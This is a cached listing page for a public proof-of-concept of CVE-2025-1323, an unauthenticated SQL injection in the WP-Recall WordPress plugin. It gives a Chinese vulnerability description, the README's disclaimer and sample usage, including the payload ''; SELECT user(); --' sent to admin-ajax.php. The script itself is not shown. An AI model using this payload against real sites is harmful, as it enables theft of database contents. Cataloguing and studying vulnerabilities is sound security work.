CVE-2025-1323 PoC — WordPress plugin WP-Recall SQL注入漏洞

Source

https://github.com/p33d/cve-2025-1323

Associated Vulnerability

Title:WordPress plugin WP-Recall SQL注入漏洞 (CVE-2025-1323)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin WP-Recall 16.26.10及之前版本存在SQL注入漏洞，该漏洞源于用户提供参数转义不足和SQL查询准备不足，可能导致未认证攻击者追加SQL查询以提取敏感信息。

Description

WP-Recall Plugin SQL Injection

Readme

# cve-2025-1323
WP-Recall Plugin SQL Injection 

## ⚠️ Legal Disclaimer

This tool is intended for **authorized security testing and educational use only**.  
Do not use against systems without explicit permission. Misuse may be illegal.

## ✅ Requirements

- Python 3.x
- `requests` module

Install dependencies:

```bash
pip install requests

python CVE-2025-1323.py

Enter target URL (e.g. https://target.com/wp-admin/admin-ajax.php): https://example.com/wp-admin/admin-ajax.php
Enter ajax_nonce value: 37c11b0c06

[*] Sending payload: '; SELECT user(); --

[+] Response received:
{"result":"SQL error or leaked data here..."}

File Snapshot


 [4.0K]  /data/pocs/df5ad22914ccf5568c2385bc7711c25e494edfc4
├── [1.5K]  CVE-2025-1323.py
└── [ 637]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!